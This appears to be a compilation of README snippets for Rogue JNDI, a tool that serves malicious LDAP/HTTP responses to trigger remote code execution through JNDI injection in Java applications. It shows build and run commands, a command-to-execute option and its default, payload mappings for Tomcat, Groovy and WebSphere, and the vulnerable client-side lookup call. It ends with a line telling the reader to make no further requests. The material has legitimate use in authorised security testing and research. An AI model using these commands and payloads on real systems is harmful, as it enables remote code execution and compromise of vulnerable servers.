### Example Rogue JNDI Server Execution Source: https://github.com/veracode-research/rogue-jndi/blob/master/README.md Illustrates how to run the Rogue JNDI server with a custom command and hostname, showing the server startup messages and the various LDAP mappings created for different payloads. ```Shell $ java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10" +-+-+-+-+-+-+-+-+-+ |R|o|g|u|e|J|n|d|i| +-+-+-+-+-+-+-+-+-+ Starting HTTP server on 0.0.0.0:8000 Starting LDAP server on 0.0.0.0:1389 Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 ``` -------------------------------- ### Build Rogue JNDI Project Source: https://github.com/veracode-research/rogue-jndi/blob/master/README.md Instructions for building the Rogue JNDI project using Maven. This command compiles the source code and packages it into a JAR file, requiring Java 1.7+ and Maven 3+. ```Shell mvn package ``` -------------------------------- ### Rogue JNDI Command Line Usage and Options Source: https://github.com/veracode-research/rogue-jndi/blob/master/README.md Displays the command-line options for the Rogue JNDI tool, including parameters for specifying the command to execute on the target, the local HTTP server hostname, LDAP and HTTP bind ports, and payload-specific options like WSDL files or local JARs. ```Shell $ java -jar target/RogueJndi-1.0.jar -h +-+-+-+-+-+-+-+-+-+ |R|o|g|u|e|J|n|d|i| +-+-+-+-+-+-+-+-+-+ Usage: java -jar target/RogueJndi-1.0.jar [options] Options: -c, --command Command to execute on the target server (default: /Applications/Calculator.app/Contents/MacOS/Calculator) -n, --hostname Local HTTP server hostname (required for remote classloading and websphere payloads) (default: 192.168.1.10) -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8000) --wsdl [websphere1 payload option] WSDL file with XXE payload (default: /list.wsdl) --localjar [websphere2 payload option] Local jar file to load (this file should be located on the remote server) (default: ../../../../../tmp/jar_cache7808167489549525095.tmp) -h, --help Show this help ``` -------------------------------- ### Perform JNDI Lookup for LDAP Injection Source: https://github.com/veracode-research/rogue-jndi/blob/master/README.md Demonstrates how a vulnerable Java client initiates a JNDI resolution to a malicious LDAP server, triggering a connection that can lead to remote code execution. This is the client-side action to trigger the attack. ```Java InitialContext.doLookup("ldap://your_server.com:1389/o=reference"); ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.